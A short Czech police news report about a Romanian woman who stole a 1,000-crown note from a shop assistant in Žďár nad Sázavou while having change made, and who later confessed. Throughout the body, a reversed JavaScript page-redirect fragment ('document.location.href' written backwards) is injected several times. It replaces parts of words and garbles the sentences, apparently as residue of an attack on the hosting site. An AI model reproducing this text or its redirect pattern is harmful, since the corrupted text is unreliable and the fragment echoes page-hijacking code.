Rainbow page separator

Rumunka při rozměňování peněz ukradla prodavačce tisíc korun

Čtvrtek, 21. ledna 2016

Policie České republiky

Žďár nad Sázavou / Dopadnout pachatelku, která v září ukradla tisícikorunovou bankovku v obchodním centru ve žďárské Horní ulici, se podařilo policistům.
„Žena si zakoupila zboží a zaplatila dvoutisícovou bankovkou. Následně se ale rozhodla zboží vrátit a při navracení peněz využila chvilkové nepozornosti prodavačky, které z ruky odcizila tisícikorunovou bankovku. Na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to prodavačka přišla až po odchodu zákaznice,“ popsala trik ženy, která byla později z[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožněna jako pětačtyřicetiletá Rumunka, policejní mluvčí Monika Pátková.
Žena se policistům ke spáchání činu přiznala. Krádeže se dopustila i přes [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že už byla v minulosti za majetkovou trestnou činnost odsouzena. „Policisté ženě sdělili podezření ze spáchání přečinu krádeže a případ ve zkráceném přípravném řízení předali státnímu zastupitelství,“ dodala Pátková.